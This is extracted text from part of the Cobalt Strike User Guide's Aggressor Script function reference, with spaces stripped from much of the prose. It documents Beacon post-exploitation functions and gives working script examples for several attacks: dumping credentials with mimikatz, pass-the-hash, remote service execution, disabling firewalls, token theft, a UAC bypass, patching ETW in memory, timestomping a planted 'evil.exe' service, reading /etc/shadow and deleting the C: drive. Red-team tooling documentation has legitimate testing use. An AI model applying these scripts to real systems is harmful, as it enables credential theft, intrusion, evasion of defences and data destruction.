AggressorScript/Functions item "Dump &Passwords" { binput($1, "logonpasswords"); blogonpasswords($1); } Injectintothespecifiedprocess beacon_command_register( "logonpasswords_inject", "Inject into a process and dump in-memory credentials with mimikatz", "Usage: logonpasswords_inject [pid] [arch]"); alias logonpasswords_inject { blogonpasswords($1, $2, $3); } bls TaskaBeacontolistfiles Variations bls($1, "folder"); OutputtheresultstotheBeaconconsole. bls($1, "folder", &callback); Routeresultstothespecifiedcallbackfunction. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-(optional)thefoldertolistfilesfor.Use"."forthecurrentfolder. $3-(optional)callbackfunctionwiththelsresults.Argumentstothecallbackare:$1=beacon ID,$2=thefolder,$3=results Example CobaltStrikeUserGuide www.fortra.com page:310
AggressorScript/Functions on beacon_initial { bls($1, "."); } bmimikatz AskBeacontorunamimikatzcommand. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thecommandandargumentstorun.Supportsthesemicolon( ;)charactertoseparate multiplecommands $3-(optional)thePIDtoinjectthemimikatzcommandintoor$null $4-(optional)thearchitectureofthetargetPID(x86|x64)or$null $5-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID, $2=results,$3=informationmap Examples
Usage: coffee [pid] [arch]
alias coffee { if ($2 >= 0 && ($3 eq "x86" || $3 eq "x64")) { bmimikatz($1, "standard::coffee", $2, $3); } else { bmimikatz($1, "standard::coffee"); } } alias double_espresso { bmimikatz($1, "standard::coffee;standard::coffee"); } bmimikatz_small UseCobaltStrike's"smaller"internalbuildofMimikatztoexecuteamimikatzcommand. Arguments CobaltStrikeUserGuide www.fortra.com page:311
AggressorScript/Functions $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thecommandandargumentstorun.Supportsthesemicolon( ;)charactertoseparate multiplecommands $3 -(optional)thePIDtoinjectthemimikatzcommandintoor$null $4 -(optional)thearchitectureofthetargetPID(x86|x64)or$null $5-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID, $2=results,$3=informationmap Note Thismimikatzbuildsupports:
- kerberos::golden
- lsadump::dcsync
- sekurlsa::logonpasswords
- sekurlsa::pth Alloftheotherstuffisremovedforsize.Use&bmimikatzifyouwanttobringthefullpowerof mimikatztosomeotheroffenseproblem. Example
Usage: logonpasswords_elevate [pid] [arch]
alias logonpasswords_elevate { if ($2 >= 0 && ($3 eq "x86" || $3 eq "x64")) { bmimikatz_small($1, "!sekurlsa::logonpasswords", $2, $3); } else { bmimikatz_small($1, "!sekurlsa::logonpasswords"); } } bmkdir AskBeacontomakeadirectory Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. CobaltStrikeUserGuide www.fortra.com page:312
AggressorScript/Functions $2-thefoldertocreate Example bmkdir($1, "you are owned"); bmode ChangethedatachannelforaDNSBeacon. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thedatachannel(e.g.,dns,dns6,ordns-txt) Example item "Mode DNS-TXT" { binput($1, "mode dns-txt"); bmode($1, "dns-txt"); } bmv AskBeacontomoveafileorfolder. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thefileorfoldertomove $3-thedestination Example bmv($1, "evil.exe", "\\target\\C$\evil.exe"); bnet CobaltStrikeUserGuide www.fortra.com page:313
AggressorScript/Functions RunacommandfromBeacon'snetworkandhostenumerationtool. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thecommandtorun. Type Description computers listshostsinadomain(groups) dclist listsdomaincontrollers domain showthecurrentdomain domain_controllers listdomaincontrollerhostsinadomain(groups) domain_trusts listsdomaintrusts group listsgroupsandusersingroups localgroup listslocalgroupsandusersinlocalgroups logons listsusersloggedontoahost sessions listssessionsonahost share listssharesonahost user listsusersanduserinformation time showtimeforahost view listshostsinadomain(browserservice) $3-thetargettorunthiscommandagainstor$null $4-theparametertothiscommand(e.g.,agroupname) $5-(optional)thePIDtoinjectthenetworkandhostenumerationtoolintoor$null $6-(optional)thearchitectureofthetargetPID(x86|x64)or$null $7-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID, $2=results,$3=informationmap NOTE: ThedomaincommandexecutesaBOFusinginline_executeandwillnotspawnorinject intoaprocess CobaltStrikeUserGuide www.fortra.com page:314
AggressorScript/Functions Example Spawnatemporaryprocess
ladmins [target]
find the local admins for a target
alias ladmins { bnet($1, "localgroup", $2, "administrators"); } Injectintothespecifiedprocess
ladmins [pid] [arch] [target]
find the local admins for a target
alias ladmins { bnet($1, "localgroup", $4, "administrators", $2, $3); } bnote AssignanotetothespecifiedBeacon. Arguments $1-theidforthebeacontopostto $2-thenotecontent Example bnote($1, "foo"); bof_extract Thisfunctionextractstheexecutablecodefromthebeaconobjectfile. Arguments $1-Astringcontainingthebeaconobjectfile CobaltStrikeUserGuide www.fortra.com page:315
AggressorScript/Functions Example $handle = openf(script_resource("/object_file")); $data = readb($handle, -1); closef($handle); return bof_extract($data); bof_pack Packargumentsinawaythat'ssuitableforBOFAPIstounpack. Arguments $1-theidfortheBeacon(neededforunicodeconversions) $2-formatstringforthepackeddata ...-oneargumentperiteminourformatstring Note Thisfunctionpacksitsargumentsintoabinarystructureforusewith&beacon_inline_execute. TheformatstringoptionsherecorrespondtotheBeaconDataCAPIavailabletoBOFfiles.This APIhandlestransformationsonthedataandhintsasrequiredbyeachtypeitcanpack. Type Description Unpack With (C) b binarydata BeaconDataExtract i 4-byteinteger BeaconDataInt s 2-byteshortinteger BeaconDataShort z zero-terminated+encodedstring BeaconDataExtract Z zero-terminatedwide-charstring (wchar_t)BeaconDataExtract TheCobaltStrikedocumentationhasapagespecifictoBOFfiles.SeeBeacon Object Files on page 171. Seealso &beacon_inline_execute CobaltStrikeUserGuide www.fortra.com page:316
AggressorScript/Functions bpassthehash AskBeacontocreateatokenthatpassesthespecifiedhash.Thisisthepthcommandin Beacon.Itusesmimikatz.Thisfunctionrequiresadministratorprivileges. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thedomainoftheuser $3-theuser'susername $4-theuser'spasswordhash $5 -(optional)thePIDtoinjectthepthcommandintoor$null $6 -(optional)thearchitectureofthetargetPID(x86|x64)or$null Example Spawnatemporaryprocess bpassthehash($1, "CORP", "Administrator", "password_hash"); Injectintothespecifiedprocess bpassthehash($1, "CORP", "Administrator", "password_hash", 1234, "x64"); bpause AskBeacontopauseitsexecution.Thisisaone-offsleep. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-howlongtheBeaconshouldpauseexecutionfor(milliseconds) Example CobaltStrikeUserGuide www.fortra.com page:317
AggressorScript/Functions alias pause { bpause($1, int($2)); } bportscan AskBeacontorunitsportscanner. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thetargetstoscan(e.g.,192.168.12.0/24) $3-theportstoscan(e.g.,1-1024,6667) $4-thediscoverymethodtouse(arp|icmp|none) $5-themaxnumberofsocketstouse(e.g.,1024) $6 -(optional)thePIDtoinjecttheportscannerintoor$null $7 -(optional)thearchitectureofthetargetPID(x86|x64)or$null $8-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID, $2=results,$3=informationmap Example Spawnatemporaryprocess bportscan($1, "192.168.12.0/24", "1-1024,6667", "arp", 1024); Injectintothespecifiedprocess bportscan($1, "192.168.12.0/24", "1-1024,6667", "arp", 1024, 1234, "x64"); bpowerpick Spawnaprocess,injectUnmanagedPowerShell,andrunthespecifiedcommand. CobaltStrikeUserGuide www.fortra.com page:318
AggressorScript/Functions Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thecmdletandarguments $3-(optional)ifspecified,powershell-importscriptisignoredandthisargumentistreatedas thedownloadcradletoprependtothecommand.EmptystringisOKheretoo,fornodownload cradle.Specify$nulltousethecurrentimportedPowerShellscript. $4-(optional)the"PATCHES:"argumentcanmodifyfunctionsinmemoryfortheprocess.Upto 4"patch-rule"rulescanbespecified(spacedelimited). $5-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID, $2=results,$3=informationmap "patch-rule" syntax (comma delimited): [library],[function],[offset],[hex- patch-value] library -1-260characters function -1-256characters offset -0-65535(Theoffsetfromthestartoftheexecutablefunction) hex-patch-value-2-200hexcharacters(0-9,A-F).Lengthmustbeevennumber(hex pairs). Example
get the version of PowerShell available via Unmanaged PowerShell
alias powerver { bpowerpick($1, '$PSVersionTable.PSVersion'); } alias powerver2 { bpowerpick($1, '$PSVersionTable.PSVersion', '', 'PATCHES: ntdll.dll,EtwEventWrite,0,C300'); } bpowershell AskBeacontorunaPowerShellcmdlet Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. CobaltStrikeUserGuide www.fortra.com page:319
AggressorScript/Functions $2-thecmdletandarguments $3-(optional)ifspecified,powershell-importscriptisignoredandthisargumentistreatedas thedownloadcradletoprependtothecommand.EmptystringisOKheretoo,fornodownload cradle.Specify$nulltousethecurrentimportedPowerShellscript. $4-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID, $2=results,$3=informationmap Example
get the version of PowerShell...
alias powerver { bpowershell($1, '$PSVersionTable.PSVersion'); } bpowershell_import ImportaPowerShellscriptintoaBeacon Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thepathtothelocalfiletoimport Example
quickly run PowerUp
alias powerup { bpowershell_import($1, script_resource("PowerUp.ps1")); bpowershell($1, "Invoke-AllChecks"); } bpowershell_import_clear CleartheimportedPowerShellscriptfromaBeaconsession. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. CobaltStrikeUserGuide www.fortra.com page:320
AggressorScript/Functions Example alias powershell-clear { bpowershell_import_clear($1); } bppid SetaparentprocessforBeacon'schildprocesses Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-theparentprocessID.Specify0toresettodefaultbehavior. Notes l Thecurrentsessionmusthaverightstoaccessthespecifiedparentprocess. l Attemptstospawnpost-exjobsunderparentprocessesinanotherdesktopsession mayfail.ThislimitationisduetohowBeaconlaunchesits"temporary"processesfor post-exploitationjobsandinjectscodeintothem. Example alias prepenv { btask($1, "Tasked Beacon to find explorer.exe and make it the PPID"); bps($1, { local('$pid $name $entry'); foreach $entry (split("\n", $2)) { ($name, $null, $pid) = split("\s+", $entry); if ($name eq "explorer.exe") { bppid($1, $pid); } } }); } bprintscreen AskBeacontotakeascreenshotviaPrintScrmethod. CobaltStrikeUserGuide www.fortra.com page:321
AggressorScript/Functions Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-(optional)thePIDtoinjectthescreenshottoolviaPrintScrmethodor$null. $3-(optional)thearchitectureofthetargetPID(x86|x64)or$null. Example Spawnatemporaryprocess item "&Printscreen" { binput($1, "printscreen"); bpintscreen($1); } Injectintothespecifiedprocess bprintscreen($1, 1234, "x64"); bps TaskaBeacontolistprocesses Variations bps($1); OutputtheresultstotheBeaconconsole. bps($1, &callback); Routeresultstothespecifiedcallbackfunction. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. CobaltStrikeUserGuide www.fortra.com page:322
AggressorScript/Functions $2-(optional)callbackfunctionwiththepsresults.Argumentstothecallbackare:$1=beacon ID,$2=results Example on beacon_initial { bps($1); } alias prepenv { btask($1, "Tasked Beacon to find explorer.exe and make it the PPID"); bps($1, { local('$pid $name $entry'); foreach $entry (split("\n", $2)) { ($name, $null, $pid) = split("\s+", $entry); if ($name eq "explorer.exe") { bppid($1, $pid); } } }); } bpsexec AskBeacontospawnapayloadonaremotehost.ThisfunctiongeneratesanArtifactKit executable,copiesittothetarget,andcreatesaservicetorunitandcleanitup. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thetargettospawnapayloadonto $3-thelistenertospawn $4-thesharetocopytheexecutableto $5-thearchitectureofthepayloadtogenerate/deliver(x86orx64) Example CobaltStrikeUserGuide www.fortra.com page:323
AggressorScript/Functions brev2self(); bloginuser($1, "CORP", "Administrator", "toor"); bpsexec($1, "172.16.48.3", "my listener", "ADMIN$"); bpsexec_command AskBeacontorunacommandonaremotehost.Thisfunctioncreatesaserviceontheremote host,startsit,andcleansitup. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thetargettorunthecommandon $3-thenameoftheservicetocreate $4-thecommandtorun. Example
disable the firewall on a remote target
beacon> shieldsdown [target]
alias shieldsdown { bpsexec_command($1, $2, "shieldsdn", "cmd.exe /c netsh advfirewall set allprofiles state off"); } bpsexec_psh REMOVED Removed in Cobalt Strike 4.0. Use &bjump with psexec_psh option. bpsinject InjectUnmanagedPowerShellintoaspecificprocessandrunthespecifiedcmdlet.Thiswilluse thecurrentimportedpowershellscript. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-theprocesstoinjectthesessioninto CobaltStrikeUserGuide www.fortra.com page:324
AggressorScript/Functions $3-theprocessarchitecture(x86|x64) $4-thecmdlettorun $5-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID, $2=results,$3=informationmap Example bpsinject($1, 1234, x64, "[System.Diagnostics.Process]::GetCurrentProcess()"); bpwd AskBeacontoprintitscurrentworkingdirectory Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. Example alias pwd { bpwd($1); } breg_query AskBeacontoqueryakeywithintheregistry. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thepathtothekey $3-x86|x64-whichviewoftheregistrytouse Example alias typedurls { breg_query($1, "HKCU\Software\Microsoft\Internet Explorer\TypedURLs", CobaltStrikeUserGuide www.fortra.com page:325
AggressorScript/Functions "x86"); } breg_queryv AskBeacontoqueryavaluewithinaregistrykey. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thepathtothekey $3-thenameofthevaluetoquery $4-x86|x64-whichviewoftheregistrytouse Example alias winver { breg_queryv($1, "HKLM\Software\Microsoft\Windows NT\CurrentVersion", "ProductName", "x86"); } bremote_exec AskBeacontorunacommandonaremotetarget. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-theremoteexecutemethodtouse $3-theremotetarget $4-thecommandandargumentstorun Example
winrm [target] [command+args]
alias winrm-exec { CobaltStrikeUserGuide www.fortra.com page:326
AggressorScript/Functions bremote_exec($1, "winrm", $2, $3); { } Seealso &beacon_remote_exec_method_describe,&beacon_remote_exec_method_register,&beacon_ remote_exec_methods brev2self AskBeacontodropitscurrenttoken.ThiscallstheRevertToSelf()Win32API. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. Example alias rev2self { brev2self($1); } brm AskBeacontoremoveafileorfolder. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thefileorfoldertoremove Example
nuke the system
brm($1, "c:\"); brportfwd AskBeacontosetupareverseportforward. CobaltStrikeUserGuide www.fortra.com page:327
AggressorScript/Functions Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-theporttobindtoonthetarget $3-thehosttoforwardconnectionsto $4-theporttoforwardconnectionsto Example brportfwd($1, 80, "192.168.12.88", 80); brportfwd_local AskBeacontosetupareverseportforwardthatroutestothecurrentCobaltStrikeclient. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-theporttobindtoonthetarget $3-thehosttoforwardconnectionsto $4-theporttoforwardconnectionsto Example brportfwd_local($1, 80, "192.168.12.88", 80); brportfwd_stop AskBeacontostopareverseportforward Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-theportboundonthetarget CobaltStrikeUserGuide www.fortra.com page:328
AggressorScript/Functions Example brportfwd_stop($1, 80); brun AskBeacontorunacommand Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thecommandandargumentstorun Note Thiscapabilityisasimplerversionofthe&beacon_execute_jobfunction.Thelatterfunctionis what&bpowershelland&bshellbuildon.Thisisa(slightly)moreOPSEC-safeoptiontorun commandsandreceiveoutputfromthem. Example alias w { brun($1, "whoami /all"); } brunas AskBeacontorunacommandasanotheruser. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thedomainoftheuser $3-theuser'susername $4-theuser'spassword $5-thecommandtorun CobaltStrikeUserGuide www.fortra.com page:329
AggressorScript/Functions Example brunas($1, "CORP", "Administrator", "toor", "notepad.exe"); brunasadmin REMOVED Removed in Cobalt Strike 4.0. Use &belevate_command with psexec_psh option. AskBeacontorunacommandinahigh-integritycontext(bypassesUAC). Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thecommandanditsarguments. Notes ThiscommandusestheTokenDuplicationUACbypass.Thisbypasshasafewrequirements: l Yourusermustbealocaladmin l IfAlways Notifyisenabled,anexistinghighintegrityprocessmustberunninginthe currentdesktopsession. Example
disable the firewall
brunasadmin($1, "cmd.exe /C netsh advfirewall set allprofiles state off"); brunu AskBeacontorunaprocessunderanotherprocess. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thePIDoftheparentprocess $3-thecommand+argumentstorun CobaltStrikeUserGuide www.fortra.com page:330
AggressorScript/Functions Example brunu($1, 1234, "notepad.exe"); bscreenshot AskBeacontotakeascreenshot. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-(optional)thePIDtoinjectthescreenshottoolor$null $3-(optional)thearchitectureofthetargetPID(x86|x64)or$null Example Spawnatemporaryprocess item "&Screenshot" { binput($1, "screenshot"); bscreenshot($1); } Injectintothespecifiedprocess bscreenshot($1, 1234, "x64"); bscreenwatch AskBeacontotakeperiodicscreenshots Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-(optional)thePIDtoinjectthescreenshottoolor$null CobaltStrikeUserGuide www.fortra.com page:331
AggressorScript/Functions $3-(optional)thearchitectureofthetargetPID(x86|x64)or$null Example Spawnatemporaryprocess item "&Screenwatch" { binput($1, "screenwatch"); bscreenwatch($1); } Injectintothespecifiedprocess bscreenwatch($1, 1234, "x64"); bsetenv AskBeacontosetanenvironmentvariable Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-theenvironmentvariabletoset $3-thevaluetosettheenvironmentvariableto(specify$nulltounsetthevariable) Example alias tryit { bsetenv($1, "foo", "BAR!"); bshell($1, "echo %foo%"); } bshell AskBeacontorunacommandwithcmd.exe Arguments CobaltStrikeUserGuide www.fortra.com page:332
AggressorScript/Functions $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thecommandandargumentstorun Example alias adduser { bshell($1, "net user $2 B00gyW00gy1234! /ADD"); bshell($1, "net localgroup "Administrators" $2 /ADD"); } bshinject Injectshellcode(fromalocalfile)intoaspecificprocess Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thePIDoftheprocesstoinjectinto $3-theprocessarchitecture(x86|x64) $4-thelocalfilewiththeshellcode Example bshinject($1, 1234, "x86", "/path/to/stuff.bin"); bshspawn Spawnshellcode(fromalocalfile)intoanotherprocess.ThisfunctionbenefitsfromBeacon's configurationtospawnpost-exploitationjobs(e.g.,spawnto,ppid,etc.) Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-theprocessarchitecture(x86|x64) $3-thelocalfilewiththeshellcode CobaltStrikeUserGuide www.fortra.com page:333
AggressorScript/Functions Example bshspawn($1, "x86", "/path/to/stuff.bin"); bsleep AskBeacontochangeitsbeaconingintervalandjitterfactor. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thenumberofsecondsbetweenbeacons. $3-thejitterfactor[0-99] Example alias stealthy {
sleep for 1 hour with 30% jitter factor
bsleep($1, 60 * 60, 30); } bsleepu AskBeacontochangeitsbeaconingintervalandjitterfactor. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-beaconsleepperiodstring. Thebeaconsleepperiodstringtakestheformat:ud vh xm ys zj Were: wisthenumberofdays visthenumberofhours xisthenumberofminutes CobaltStrikeUserGuide www.fortra.com page:334
AggressorScript/Functions yisthenumberofseconds zisthejitterfactor[0-99] Example alias stealthy {
sleep for 2 days 13 hours 45 minutes 8 seconds with 30% jitter factor
bsleepu($1, "2d 13h 45m 8s 30j"); } bsocks StartaSOCKSproxyserverassociatedwithabeacon. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-theporttobindto $3-SOCKSversion[SOCKS4|SOCKS5]Default:SOCKS4 ForSOCKS5only: $4-enable/disableNoAuthauthentication[enableNoAuth|disableNoAuth]Default: enableNoAuth $5-usernameforUser/Passwordauthentication[blank|username]Default:Blank $6-passwordforUser/Passwordauthentication[blank|password]Default:Blank $7-enablelogging[enableLogging|disableLogging]Default:disableLogging Example alias socksPorts { bsocks($1, 10401); bsocks($1, 10402, "SOCKS4"); bsocks($1, 10501, "SOCKS5"); bsocks($1, 10502, "SOCKS5" "enableNoAuth", "", "", "disableLogging"); bsocks($1, 10503, "SOCKS5" "enableNoAuth", "myname", CobaltStrikeUserGuide www.fortra.com page:335
AggressorScript/Functions "mypassword", "disableLogging"); bsocks($1, 10504, "SOCKS5" "disableNoAuth", "myname", "mypassword", "enableLogging"); } bsocks_stop StopSOCKSproxyserversassociatedwiththespecifiedBeacon. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. Example alias stopsocks { bsocks_stop($1); } bspawn AskBeacontospawnanewsession Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thelistenertotarget. $3-thearchitecturetospawnaprocessfor(defaultstocurrentbeaconarch) Example item "&Spawn" { openPayloadHelper(lambda({ binput($bids, "spawn x86 $1"); bspawn($bids, $1, "x86"); }, $bids => $1)); } bspawnas CobaltStrikeUserGuide www.fortra.com page:336
AggressorScript/Functions AskBeacontospawnasessionasanotheruser. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thedomainoftheuser $3-theuser'susername $4-theuser'spassword $5-thelistenertospawn Example bspawnas($1, "CORP", "Administrator", "toor", "my listener"); bspawnto ChangethedefaultprogramBeaconspawnstoinjectcapabilitiesinto. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thearchitecturewe'remodifyingthespawntosettingfor(x86,x64) $3-theprogramtospawn Notes Thevalueyouspecifyforspawntomustworkfromx86->x86,x86->x64,x64->x86,andx64->x86 contexts.Thisistricky.Followtheserulesandyou'llbeOK: 1.AlwaysspecifythefullpathtotheprogramyouwantBeacontospawnforitspost-exjobs. 2.Environmentvariables(e.g.,%windir%)areOKwithinthesepaths. 3.Donotspecify%windir%\system32orc:\windows\system32directly.Alwaysuse syswow64(x86)andsysnative(x64).Beaconwilladjustthesevaluestosystem32ifit's necessary. CobaltStrikeUserGuide www.fortra.com page:337
AggressorScript/Functions 4.Foranx86spawntovalue,youmustspecifyanx86program.Foranx64spawntovalue,you mustspecifyanx64program. Example
let's make everything lame.
on beacon_initial { binput($1, "prep session with new spawnto values."); bspawnto($1, "x86", "%windir%\syswow64\notepad.exe"); bspawnto($1, "x64", "%windir%\sysnative\notepad.exe"); } bspawnu AskBeacontospawnasessionunderanotherprocess. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-theprocesstospawnthissessionunder $3-thelistenertospawn Example bspawnu($1, 1234, "my listener"); bspunnel SpawnandtunnelanagentthroughthisBeacon(viaatargetlocalhost-onlyreverseport forward) Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thehostofthecontroller $3-theportofthecontroller $4-afilewithposition-independentcodetoexecuteinatemporaryprocess. CobaltStrikeUserGuide www.fortra.com page:338
AggressorScript/Functions Example bspunnel($1, "127.0.0.1", 4444, script_resource("agent.bin")); bspunnel_local SpawnandtunnelanagentthroughthisBeacon(viaatargetlocalhost-onlyreverseport forward).Note:thisreverseportforwardtunneltraversesthroughtheBeaconchaintotheteam serverand,viatheteamserver,outthroughtherequestingCobaltStrikeclient. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thehostofthecontroller $3-theportofthecontroller $4-afilewithposition-independentcodetoexecuteinatemporaryprocess. Example bspunnel_local($1, "127.0.0.1", 4444, script_resource("agent.bin")); bssh AskBeacontospawnanSSHsession. Arguments $1-idforthebeacon.ThismaybeanarrayorasingleID. $2-IPaddressorhostnameofthetarget $3-port(e.g.,22) $4-username $5-password $6-(optional)thePIDtoinjecttheSSHclientintoor$null CobaltStrikeUserGuide www.fortra.com page:339
AggressorScript/Functions $7-(optional)thearchitectureofthetargetPID(x86|x64)or$null Example Spawnatemporaryprocess bssh($1, "172.16.20.128", 22, "root", "toor"); Injectintothespecifiedprocess bssh($1, "172.16.20.128", 22, "root", "toor", 1234, "x64"); bssh_key AskBeacontospawnanSSHsessionusingthedatafromakeyfile.Thekeyfileneedstobein thePEMformat.IfthefileisnotinthePEMformatthenmakeacopyofthefileandconvertthe copywiththefollowingcommand: /usr/bin/ssh-keygen -f [/path/to/copy] -e -m pem -p Arguments $1-idforthebeacon.ThismaybeanarrayorasingleID. $2-IPaddressorhostnameofthetarget $3-port(e.g.,22) $4-username $5-keydata(asastring) $6-(optional)thePIDtoinjecttheSSHclientintoor$null $7-(optional)thearchitectureofthetargetPID(x86|x64)or$null Example alias myssh { $pid = $2; $arch = $3; CobaltStrikeUserGuide www.fortra.com page:340
AggressorScript/Functions $handle = openf("/path/to/key.pem"); $keydata = readb($handle, -1); closef($handle); if ($pid >= 0 && ($arch eq "x86" || $arch eq "x64")) { bssh_key($1, "172.16.20.128", 22, "root", $keydata, $pid, $arch); } else { bssh_key($1, "172.16.20.128", 22, "root", $keydata); } }; bstage REMOVED This function is removed in Cobalt Strike 4.0. Use &beacon_stage_tcp or &beacon_stage_pipe to explicitly stage a payload. Use &beacon_link to link to it. bsteal_token AskBeacontostealatokenfromaprocess. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thePIDtotakethetokenfrom Use: bsteal_token [pid] bsteal_token [pid] OpenProcessToken access mask suggested values: blank = default (TOKEN_ALL_ACCESS) 0 = TOKEN_ALL_ACCESS 11 = TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY (1+2+8) Access mask values: STANDARD_RIGHTS_REQUIRED . . . . : 983040 TOKEN_ASSIGN_PRIMARY . . . . . . : 1 TOKEN_DUPLICATE . . . . . . . . : 2 TOKEN_IMPERSONATE . . . . . . . : 4 TOKEN_QUERY . . . . . . . . . . : 8 TOKEN_QUERY_SOURCE . . . . . . . : 16 TOKEN_ADJUST_PRIVILEGES . . . . : 32 TOKEN_ADJUST_GROUPS . . . . . . : 64 TOKEN_ADJUST_DEFAULT . . . . . . : 128 TOKEN_ADJUST_SESSIONID . . . . . : 256 CobaltStrikeUserGuide www.fortra.com page:341
AggressorScript/Functions NOTE: 'OpenProcessTokenaccessmask'canbehelpfulforstealingtokensfromprocessesusing 'SYSTEM'userandyouhavethiserror:Couldnotopenprocesstoken:{pid}(5) Youcansetyourpreferreddefaultwith'.steal_token_access_mask'intheMalleableC2global options. Example alias steal_token { bsteal_token($1, int($2)); } bsudo AskBeacontorunacommandviasudo(SSHsessionsonly) Arguments $1-theidforthesession.ThismaybeanarrayorasingleID. $2-thepasswordforthecurrentuser $3-thecommandandargumentstorun Example
hashdump [password]
ssh_alias hashdump { bsudo($1, $2, "cat /etc/shadow"); } bsyscall_method AskBeacontochangeitssyscallmethod. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thesyscallmethod.Supportedmethodsare: CobaltStrikeUserGuide www.fortra.com page:342
AggressorScript/Functions None:UsethestandardWindowsAPIfunction. Direct:UsetheNtversionofthefunction. Indirect:JumptotheappropriateinstructionwithintheNtversionofthefunction. NOTE: Ifthe$2argumentisempty,Beaconistaskedtoquerythecurrentlyusedsyscallmethod. Example alias syscall_method { bsyscall_method($1, $2); } btask ReportataskacknowledgementforaBeacon.Thistaskacknowledgementwillalsocontribute tothenarrativeinCobaltStrike'sActivityReportandSessionsReport. Arguments $1-theidforthebeacontopostto $2-thetexttopost $3-astringwithMITREATT&CKTacticIDs.UseacommaandaspacetospecifymultipleIDs inonestring. https://attack.mitre.org Example alias foo { btask($1, "User tasked beacon to foo", "T1015"); } btimestomp AskBeacontochangethefilemodified/accessed/createdtimestomatchanotherfile. Arguments CobaltStrikeUserGuide www.fortra.com page:343
AggressorScript/Functions $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thefiletoupdatetimestampvaluesfor $3-thefiletograbtimestampvaluesfrom Example alias persist { bcd($1, "c:\windows\system32"); bupload($1, script_resource("evil.exe")); btimestomp($1, "evil.exe", "cmd.exe"); bshell($1, 'sc create evil binpath= "c:\windows\system32\evil.exe"'); bshell($1, 'sc start evil'); } btoken_store_remove AskBeacontoremovespecificaccesstokensfromthestore. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thearrayoftokenIDstoremove. Example alias token-store_remove { btoken_store_remove($1, @(int($2))); } btoken_store_remove_all AskBeacontoremovealltokensfromthestore. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. Example CobaltStrikeUserGuide www.fortra.com page:344
AggressorScript/Functions alias token-store_remove_all { btoken_store_remove_all($1); } btoken_store_show AskBeacontoprintthetokenscurrentlyavailableinthetokenstore. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. Example alias token-store_show { btoken_store_show($1); } btoken_store_steal AskBeacontostealatokenandstoreitinthetokenstore. Arguments $1-theidforthebeacon.ThismaybeanarrayorasingleID. $2-thearrayofPIDstotakethetokensfrom. $3-theOpenProcessTokenaccessmask. Example alias token-store_steal { btoken_store_steal($1, @(int($2)), 11); } btoken_store_steal_and_use AskBeacontostealatoken,storeitandimmediatelyapplyittothebeacon. Arguments CobaltStrikeUserGuide www.fortra.com page:345
